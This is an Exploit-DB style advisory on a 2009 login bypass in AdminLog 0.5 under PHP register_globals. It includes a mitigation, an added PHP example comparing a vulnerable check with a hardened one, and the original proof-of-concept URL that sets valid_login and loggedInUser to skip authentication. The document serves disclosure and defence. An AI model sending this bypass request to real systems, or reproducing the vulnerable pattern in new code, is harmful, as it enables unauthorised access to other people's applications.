Vendor: AdminLog
By: SirGod
CVSS: 7.5 (HIGH)
CWE: 287 (Login Bypass)
Product Name: AdminLog
Affected Version From: AdminLog 0.5
Affected Version To: AdminLog 0.5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

AdminLog 0.5 Login Bypass Vulnerability

AdminLog 0.5 is vulnerable to a login bypass when PHP's register_globals directive is set to ON. In that configuration, request parameters are imported as global variables before the script runs, so an attacker can send a crafted HTTP request to the vulnerable application with the parameters valid_login=1 and loggedInUser=[VALIDUSER] and be treated as an authenticated user without supplying a password.

Mitigation:

Disable register_globals in php.ini and use proper input validation.
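As an added illustration that is not AdminLog's own code (its source is not reproduced here), the PHP pattern that register_globals turns into a bypass, beside a hardened replacement; the function names and session keys are assumptions.

```php
<?php
// Added illustration, not AdminLog's real code: the pattern that
// register_globals=On turns into a login bypass, and a hardened form.

// --- Vulnerable pattern (assumed shape of the flaw) ---
// With register_globals=On, a request such as
//   adminlog.php?valid_login=1&loggedInUser=alice
// makes PHP create $valid_login and $loggedInUser before this runs, so a
// check on a variable that was never initialised passes with no password.
function isLoggedInVulnerable(): bool
{
    global $valid_login;          // only meant to be set after a real login
    return !empty($valid_login);  // but a query parameter can pre-set it
}

// --- Hardened pattern ---
// 1. Refuse to run if register_globals is still on (fail closed; ini_get
//    returns "" on PHP >= 5.4, where the directive no longer exists).
// 2. Keep authentication state in $_SESSION; a query parameter populates a
//    global, not a $_SESSION key.
// 3. Initialise every control variable explicitly.
function isLoggedInHardened(): bool
{
    if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
        throw new RuntimeException('register_globals must be disabled');
    }
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $validLogin = $_SESSION['valid_login'] ?? false;   // explicit default
    $user       = $_SESSION['loggedInUser'] ?? '';
    return $validLogin === true && is_string($user) && $user !== '';
}

// Login handler (assumed): the only code allowed to set the session flag,
// and only after the password verifies against the stored hash.
function loginHardened(string $user, string $password, string $storedHash): bool
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (!password_verify($password, $storedHash)) {
        return false;
    }
    session_regenerate_id(true);            // new id on privilege change
    $_SESSION['valid_login']  = true;
    $_SESSION['loggedInUser'] = $user;
    return true;
}
```

The guard on register_globals is belt-and-braces for legacy hosts; on any supported PHP release the directive does not exist and the check is simply a no-op.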

Exploit-DB raw data:

#########################################################################
[+] AdminLog 0.5 Login Bypass Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
[+] down: http://www.manlyfamily.net/wiki/doku.php?id=programming:php:adminlog
#########################################################################

[+] Login Bypass

 - Conditions : register_globals = ON

 - PoC

      http://127.0.0.1/[path]/adminlog.php?valid_login=1&loggedInUser=[VALIDUSER]

#########################################################################

# milw0rm.com [2009-07-02]